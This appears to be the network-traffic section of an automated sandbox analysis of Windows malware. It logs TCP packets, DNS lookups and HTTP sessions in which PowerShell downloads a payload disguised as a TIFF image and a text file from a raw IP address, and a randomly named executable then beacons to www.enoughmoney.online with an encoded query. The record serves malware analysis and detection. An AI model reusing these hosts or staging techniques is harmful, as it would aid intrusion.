                                                                                                      Dec 4, 2024 13:08:30.860289097 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.860331059 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:30.865689993 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.865705967 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.865768909 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:30.865777016 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.865824938 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:30.872622967 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.872653961 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.872710943 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:30.872718096 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.872760057 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:30.878859043 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.878876925 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.878937006 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:30.878943920 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.878988028 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:30.884562016 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.884618998 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.884625912 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:30.884635925 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.884676933 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:30.892379999 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.892399073 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.892457008 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:30.892466068 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.900002003 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.900048971 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.900068045 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:30.900078058 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.900113106 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:30.942723036 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:30.954642057 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.954665899 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.954763889 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:30.954782963 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:30.954828024 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:31.050561905 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:31.050592899 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:31.050668001 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:31.050678015 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:31.050698996 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:31.050721884 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:31.057552099 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:31.057571888 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:31.057624102 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:31.057631969 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:31.057676077 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:31.061470985 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:31.061553001 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:31.061562061 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:31.061574936 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:31.061630964 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:31.078484058 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:44.457801104 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:44.577636003 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:44.577769995 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:44.577931881 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:44.697619915 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:45.731849909 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:45.732044935 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:45.732058048 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:45.732134104 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:45.732505083 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:45.732517958 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:45.732559919 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:45.733340025 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:45.733352900 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:45.733392000 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:45.734185934 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:45.734199047 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.549259901 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.549308062 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.551811934 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.552001953 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.552054882 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.554579020 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.554771900 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.554822922 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.557231903 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.557426929 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.557480097 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.559845924 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.560046911 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.560096025 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.562443018 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.562609911 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.562659025 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.565017939 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.565294027 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.565341949 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.567590952 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.567765951 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.567811966 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.570030928 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.570317984 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.570370913 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.572642088 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.572789907 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.572838068 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.574969053 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.575120926 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.575170994 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.577393055 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.577593088 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.577646017 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.579974890 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.580178976 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.580226898 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.582324982 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.582564116 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.582669020 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.584793091 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.584984064 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.585046053 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.587187052 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.587393045 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.587446928 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.589689016 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.589893103 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.589947939 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.592134953 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.592333078 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.592416048 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.594552994 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.594757080 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.594816923 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.596976995 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.597202063 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.597280979 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.599422932 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.599628925 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.599673033 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.601924896 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.602085114 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.602133036 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.604326963 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.604542971 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.604598045 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.606817961 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.607057095 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.607114077 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.609251976 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.609455109 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.609503031 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.611695051 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.612015009 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.612061024 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.614270926 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.614773035 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.614852905 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.616605997 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.617216110 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.617275953 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.619102955 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.619389057 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.619445086 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.621582031 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.621750116 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.621803045 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.624871016 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.625534058 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.625586033 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.626399040 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.626607895 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.626656055 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.629914999 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.630601883 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.630656004 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.631294012 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.631514072 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.631567955 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.633829117 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.633980036 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.634030104 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.636156082 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.636379957 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.636435032 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.638612986 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.638818979 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.638870955 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.641094923 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.641297102 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.641355038 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.643553019 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.643735886 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.643785954 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.646020889 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.646246910 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.646306992 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.648416042 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.648631096 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.648683071 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.650871992 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.651072025 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.651123047 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.653316021 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.653537035 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.653585911 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.655776978 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.656039000 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.656121969 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.658180952 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.658373117 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.658430099 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.660722971 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.660909891 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.660973072 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.663176060 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.663324118 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.663374901 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.665553093 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.665719032 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.665770054 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.737396955 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.737582922 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.737695932 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.737926006 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.738154888 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.738235950 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.739700079 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.739929914 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.740009069 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.741503954 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.741916895 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.741997004 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.743254900 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.743494987 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.743597031 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.744986057 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.745197058 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.745268106 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.746732950 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.746972084 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.747047901 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.748465061 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.748821974 CET8049709107.172.44.175192.168.2.8
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 4, 2024 13:08:25.206310034 CET | 55825 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 4, 2024 13:08:25.354826927 CET | 53 | 55825 | 1.1.1.1 | 192.168.2.8 |
| Dec 4, 2024 13:09:36.086283922 CET | 51883 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 4, 2024 13:09:36.501069069 CET | 53 | 51883 | 1.1.1.1 | 192.168.2.8 |
| Dec 4, 2024 13:09:53.165796041 CET | 60316 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 4, 2024 13:09:53.512207985 CET | 53 | 60316 | 1.1.1.1 | 192.168.2.8 |
| Dec 4, 2024 13:10:08.009582043 CET | 55455 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 4, 2024 13:10:08.932662964 CET | 53 | 55455 | 1.1.1.1 | 192.168.2.8 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 4, 2024 13:08:25.206310034 CET | 192.168.2.8 | 1.1.1.1 | 0x8577 | Standard query (0) | res.cloudinary.com | A (IP address) | IN (0x0001) | false |
| Dec 4, 2024 13:09:36.086283922 CET | 192.168.2.8 | 1.1.1.1 | 0xa9ef | Standard query (0) | www.enoughmoney.online | A (IP address) | IN (0x0001) | false |
| Dec 4, 2024 13:09:53.165796041 CET | 192.168.2.8 | 1.1.1.1 | 0x1937 | Standard query (0) | www.cifasnc.info | A (IP address) | IN (0x0001) | false |
| Dec 4, 2024 13:10:08.009582043 CET | 192.168.2.8 | 1.1.1.1 | 0x79fb | Standard query (0) | www.sql.dance | A (IP address) | IN (0x0001) | false |
                                                                                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                      Dec 4, 2024 13:08:25.354826927 CET | 1.1.1.1 | 192.168.2.8 | 0x8577 | No error (0) | res.cloudinary.com | cloudinary.map.fastly.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                                                      Dec 4, 2024 13:08:25.354826927 CET | 1.1.1.1 | 192.168.2.8 | 0x8577 | No error (0) | cloudinary.map.fastly.net |  | 151.101.129.137 | A (IP address) | IN (0x0001) | false
                                                                                                      Dec 4, 2024 13:08:25.354826927 CET | 1.1.1.1 | 192.168.2.8 | 0x8577 | No error (0) | cloudinary.map.fastly.net |  | 151.101.193.137 | A (IP address) | IN (0x0001) | false
                                                                                                      Dec 4, 2024 13:08:25.354826927 CET | 1.1.1.1 | 192.168.2.8 | 0x8577 | No error (0) | cloudinary.map.fastly.net |  | 151.101.1.137 | A (IP address) | IN (0x0001) | false
                                                                                                      Dec 4, 2024 13:08:25.354826927 CET | 1.1.1.1 | 192.168.2.8 | 0x8577 | No error (0) | cloudinary.map.fastly.net |  | 151.101.65.137 | A (IP address) | IN (0x0001) | false
                                                                                                      Dec 4, 2024 13:09:36.501069069 CET | 1.1.1.1 | 192.168.2.8 | 0xa9ef | No error (0) | www.enoughmoney.online |  | 172.67.150.211 | A (IP address) | IN (0x0001) | false
                                                                                                      Dec 4, 2024 13:09:36.501069069 CET | 1.1.1.1 | 192.168.2.8 | 0xa9ef | No error (0) | www.enoughmoney.online |  | 104.21.0.98 | A (IP address) | IN (0x0001) | false
                                                                                                      Dec 4, 2024 13:09:53.512207985 CET | 1.1.1.1 | 192.168.2.8 | 0x1937 | No error (0) | www.cifasnc.info |  | 172.67.128.109 | A (IP address) | IN (0x0001) | false
                                                                                                      Dec 4, 2024 13:09:53.512207985 CET | 1.1.1.1 | 192.168.2.8 | 0x1937 | No error (0) | www.cifasnc.info |  | 104.21.1.251 | A (IP address) | IN (0x0001) | false
                                                                                                      Dec 4, 2024 13:10:08.932662964 CET | 1.1.1.1 | 192.168.2.8 | 0x79fb | No error (0) | www.sql.dance |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
                                                                                                      • res.cloudinary.com
                                                                                                      • 107.172.44.175
                                                                                                      • www.enoughmoney.online
                                                                                                      • www.cifasnc.info
                                                                                                      • www.sql.dance
                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      0 | 192.168.2.8 | 49704 | 107.172.44.175 | 80 | 6772 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Dec 4, 2024 13:08:19.040237904 CET | 337 | OUT | GET /244/nightridingisreallyniceforworkingskillentiretimefornew.tiFF HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                      Host: 107.172.44.175
                                                                                                      Connection: Keep-Alive
                                                                                                      Dec 4, 2024 13:08:20.148108006 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Wed, 04 Dec 2024 12:08:19 GMT
                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                      Last-Modified: Wed, 04 Dec 2024 08:28:47 GMT
                                                                                                      ETag: "259fc-6286d921a132d"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 154108
                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: image/tiff


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      1 | 192.168.2.8 | 49709 | 107.172.44.175 | 80 | 6364 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Dec 4, 2024 13:08:44.577931881 CET | 77 | OUT | GET /244/RFGDF.txt HTTP/1.1
                                                                                                      Host: 107.172.44.175
                                                                                                      Connection: Keep-Alive
                                                                                                      Dec 4, 2024 13:08:45.731849909 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Wed, 04 Dec 2024 12:08:44 GMT
                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                      Last-Modified: Wed, 04 Dec 2024 06:37:02 GMT
                                                                                                      ETag: "5e2ac-6286c026f0aa9"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 385708
                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: text/plain


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      2 | 192.168.2.8 | 49723 | 172.67.150.211 | 80 | 60 | C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Dec 4, 2024 13:09:36.642601967 CET | 495 | OUT | GET /r72u/?-DiH=2XvD5&CJE8V=GItYwatNh5Xk+Q2MTg9ApsiGHoFk1E90IzupkRdOfJqts8zyaMFRFG2wZpK3L9f87JrBtQZPR7+NA6TbtORZfIe2HAOWLNTCJkmVcfUZGPKfL9xE/oouBrRom1yDfEIfZg== HTTP/1.1
                                                                                                      Host: www.enoughmoney.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
